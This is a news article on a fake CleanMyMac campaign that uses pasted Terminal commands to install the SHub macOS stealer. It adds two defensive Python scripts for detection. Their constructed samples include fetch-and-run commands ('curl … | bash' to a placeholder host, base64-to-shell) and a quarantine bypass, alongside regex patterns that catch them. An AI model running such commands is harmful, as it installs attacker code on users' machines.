- Fake CleanMyMac Utility Spreads SHub Information Stealer
- Attack tricks users into pasting terminal commands
- Malware steals credentials and cryptocurrency and persists through a backdoor
A fake Mac utility program is tricking users into installing information-stealing malware that leaks passwords, sensitive files and even money, experts have warned.
Security researchers at Malwarebytes said the program was part of a broader, highly sophisticated campaign that also included a custom website, spoofing of a reputable brand, a loader, and the well-worn ClickFix technique.
Researchers said the campaign spoofed CleanMyMac, a legitimate Mac optimization program made by MacPaw, with a nearly identical website at cleanmymacos.[DOT]org that is easy to mistake for the real thing. Instead of downloading and running an installer, however, victims are told to open Terminal and paste a command that downloads and executes the payload from a remote server.
Steal files and establish persistence
“Instead of exploiting a vulnerability, it tricks the user into running the malware themselves,” Malwarebytes explained. “Because the command is executed voluntarily, protections such as Gatekeeper, notarization checks, and XProtect offer little protection once the user pastes the command and presses Return.”
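The "paste this into Terminal" step is the part of the chain a defender can hunt for after the fact, because the pasted command lands in the user's shell history. The script below is an added example, not Malwarebytes' or TechRadar's code: it scans a shell history (zsh extended format or plain bash) for the command shapes ClickFix lures rely on, a remote fetch piped into a shell, a base64 blob decoded into a shell, a `sh -c` wrapper around a fetch, and removal of the quarantine attribute. The history lines, domain and paths in it are constructed for illustration and are not indicators from the report; the rule names are this example's own.

```python
"""Flag shell-history entries that match the ClickFix 'paste this into Terminal'
pattern. Added example for this article, not Malwarebytes' or TechRadar's code.
The sample history, domain and paths below are constructed, not indicators."""
import re
from typing import Dict, List

# (rule name, regex). Patterns are deliberately broad; tune them for your fleet.
RULES = [
    # curl/wget output piped straight into sh/bash/zsh/ksh (optionally via sudo)
    ("remote_fetch_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")),
    # an inline base64 blob decoded and piped into a shell
    ("base64_decode_to_shell",
     re.compile(r"\bbase64\s+(-d|--decode|-D)\b[^|;]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")),
    # eval of a command substitution that fetches its own body
    ("eval_of_fetch",
     re.compile(r"\beval\b.*\$\((curl|wget)\b")),
    # sh -c "..." whose body contains a fetch
    ("shell_c_with_fetch",
     re.compile(r"\b(ba|z|k)?sh\s+-c\s+['\"].*\b(curl|wget)\b")),
    # stripping com.apple.quarantine so Gatekeeper never sees the file
    ("quarantine_bypass",
     re.compile(r"\bxattr\b.*\s-(d\s+com\.apple\.quarantine|cr?\b)")),
]


def classify(command: str) -> List[str]:
    """Names of every rule the command line trips; empty list means clean."""
    return [name for name, rx in RULES if rx.search(command)]


def scan_history(lines) -> List[Dict]:
    """Walk history lines (1-based numbering) and return one dict per hit."""
    hits = []
    for lineno, raw in enumerate(lines, 1):
        cmd = raw.strip()
        # zsh extended history prefixes each entry with ': <epoch>:<elapsed>;'
        if cmd.startswith(": ") and ";" in cmd:
            cmd = cmd.split(";", 1)[1]
        if not cmd or cmd.startswith("#"):
            continue
        matched = classify(cmd)
        if matched:
            hits.append({"line": lineno, "command": cmd, "rules": matched})
    return hits


# Constructed zsh history for the demo; cdn.example.invalid is a placeholder.
SAMPLE_HISTORY = """\
: 1712345678:0;ls -la ~/Downloads
: 1712345690:0;brew update && brew upgrade
: 1712345700:0;curl -fsSL https://cdn.example.invalid/install.sh | bash
: 1712345720:0;echo aGVsbG8= | base64 -d | sh
: 1712345730:0;xattr -d com.apple.quarantine ~/Downloads/Tool.app
: 1712345740:0;git log --oneline | head
: 1712345750:0;bash -c "$(curl -s https://cdn.example.invalid/x)"
""".splitlines()


if __name__ == "__main__":
    import sys
    # With a path argument, scan a real history file; otherwise use the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read().splitlines()
    else:
        source = SAMPLE_HISTORY
    for hit in scan_history(source):
        print(f"line {hit['line']}: {', '.join(hit['rules'])}: {hit['command']}")
```

Run it against `~/.zsh_history` or `~/.bash_history` by passing the path as the first argument; with no argument it scans the constructed sample. The rules are intentionally noisy so that a `curl | bash` typed by a developer is surfaced too; the point is to give a responder a short list of candidate lines to read, not a verdict.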
The malware installed this way is called SHub, and during installation it asks the victim for their macOS password. Because the whole installation is already unusual and looks like the kind of thing a power user would do, victims are likely to treat the password prompt as routine, the researchers explained.
In reality, that password unlocks the macOS keychain, giving SHub access to Wi-Fi credentials, app tokens, and other private keys stored there.
“With the password in hand, SHub begins a systematic sweep of the machine,” Malwarebytes researchers said.
After stealing passwords, cookies, autofill data, crypto wallet browser extensions, iCloud account data, Telegram session files and other valuables, it launches a second-stage backdoor that replaces some cryptocurrency wallet apps with malicious copies. That gives the malware a foothold on the machine and a way to steal further cryptocurrency in the future.
Finally, the attackers install a LaunchAgent whose name mimics a Google update service, so the backdoor is relaunched at every login.
“In practice, this gives attackers the ability to execute commands on the infected Mac at any time until the persistence mechanism is discovered and removed,” the report concludes.
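The LaunchAgent is the piece that survives, and also the piece that is easiest to audit. Below is an added example, not Malwarebytes' or TechRadar's code, of a small triage script: it parses every plist in a LaunchAgents directory with the standard-library plistlib and flags the pattern the report describes, a label that borrows a trusted vendor's name while the program it launches lives somewhere that vendor would not use, runs from a temporary or shared directory, or fetches and decodes a payload at launch instead of running a binary. The vendor-path table, the `com.google.` prefix and the suspicious-directory list are assumptions for this example; the three plists it writes into a temporary directory are constructed for illustration, and their labels, paths and domain are placeholders, not indicators from the report.

```python
"""Triage LaunchAgent plists for a spoofed-vendor persistence entry.
Added example for this article, not Malwarebytes' or TechRadar's code.
The sample plists, labels, paths and domain are constructed, not indicators."""
import plistlib
import re
import shutil
import sys
import tempfile
from pathlib import Path
from typing import Dict, List

# Assumed for this example: a com.google.* agent that does not launch something
# under a Google directory is flagged for review.
VENDOR_PATHS = {
    "com.google.": ("/Library/Google/", "/Applications/Google Chrome.app/"),
}
# Places a legitimate vendor agent would not run from (assumed list).
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
# Arguments that fetch or decode a payload at launch instead of running a binary.
FETCH_OR_DECODE = re.compile(r"\b(curl|wget|base64|osascript)\b|\b(ba|z)?sh\s+-c\b")


def program_path(plist: Dict) -> str:
    """The executable launchd will run: 'Program' wins, else ProgramArguments[0]."""
    args = plist.get("ProgramArguments") or []
    return str(plist.get("Program") or (args[0] if args else ""))


def assess(plist: Dict) -> List[str]:
    """Findings for one parsed plist; an empty list means nothing looked odd."""
    findings = []
    label = str(plist.get("Label", ""))
    prog = program_path(plist)
    argv = " ".join(str(a) for a in plist.get("ProgramArguments") or [])
    for prefix, allowed in VENDOR_PATHS.items():
        if label.startswith(prefix) and not any(p in prog for p in allowed):
            findings.append("label_spoofs_trusted_vendor")
    if any(prog.startswith(d) for d in SUSPICIOUS_DIRS):
        findings.append("program_in_temp_or_shared_dir")
    if FETCH_OR_DECODE.search(argv):
        findings.append("launch_runs_fetch_or_decode")
    return findings


def scan_dir(directory: Path) -> Dict[str, List[str]]:
    """Parse every *.plist in a directory; return {file name: findings} for hits only."""
    report = {}
    for path in sorted(directory.glob("*.plist")):
        try:
            with path.open("rb") as fh:
                plist = plistlib.load(fh)
        except Exception as exc:  # a plist launchd cannot parse is still worth a look
            report[path.name] = [f"unparseable_plist: {exc}"]
            continue
        findings = assess(plist)
        if findings:
            report[path.name] = findings
    return report


# Constructed samples: one plausible vendor agent, one spoofed label, one odd path.
SAMPLE_AGENTS = {
    "com.google.keystone.agent.plist": {
        "Label": "com.google.keystone.agent",
        "ProgramArguments": ["/Users/alice/Library/Google/GoogleSoftwareUpdate/agent",
                             "-runMode", "ifneeded"],
        "RunAtLoad": True,
    },
    "com.google.updater.plist": {
        "Label": "com.google.updater",
        "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL https://cdn.example.invalid/u | sh"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
    "com.example.helper.plist": {
        "Label": "com.example.helper",
        "ProgramArguments": ["/Users/Shared/.cache/helper", "--quiet"],
        "RunAtLoad": True,
    },
}


def scan_sample() -> Dict[str, List[str]]:
    """Write the constructed plists to a temp dir, scan it, clean up, return the report."""
    tmp = Path(tempfile.mkdtemp(prefix="launchagents-"))
    try:
        for name, contents in SAMPLE_AGENTS.items():
            with (tmp / name).open("wb") as fh:
                plistlib.dump(contents, fh)
        return scan_dir(tmp)
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    target = Path(sys.argv[1]).expanduser() if len(sys.argv) > 1 else None
    for name, findings in (scan_dir(target) if target else scan_sample()).items():
        print(f"{name}: {', '.join(findings)}")
```

Pass `~/Library/LaunchAgents` (and `/Library/LaunchAgents` for machine-wide agents) as the first argument to scan a real Mac; with no argument it runs against its own constructed samples, so it also works on a non-Mac analysis box. A hit is a reason to open the plist and verify the binary it launches, not proof of compromise, and a clean result says nothing about LaunchDaemons, login items, or the replaced wallet apps the report also describes.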